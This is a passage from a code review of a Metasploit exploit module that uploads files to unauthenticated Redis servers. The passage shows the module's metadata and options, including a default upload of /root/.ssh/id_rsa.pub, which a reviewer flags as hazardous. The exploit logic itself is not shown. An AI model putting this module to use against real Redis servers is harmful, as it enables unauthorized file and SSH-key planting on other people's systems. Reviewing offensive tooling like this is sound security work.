modules/exploits/linux/misc/redis_unauth_upload_file.rb

```diff
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Redis Unauthenticated File Upload',
+      'Description'   => %q(
+        This module can save data to file in remote redis server,
+        Because redis is unprotected without a password set up.
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => ['Nixawk'],
+      'References'    => [
+        ['URL', 'http://antirez.com/news/96'],
+        ['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
+        ['URL', 'http://redis.io/topics/protocol']
+      ],
+      'Platform'      => %w(unix linux),
+      'Targets'       => [['Automatic Target', { }]],
+      'Privileged'    => true,
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Nov 11 2015'
+      ))
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(6379),
+        OptPath.new('LocalFile', [true, 'Local file to be uploaded', '/root/.ssh/id_rsa.pub']),
```

Comment:
This seems like a potential hazardous default.  I'd suggest making it required but with no default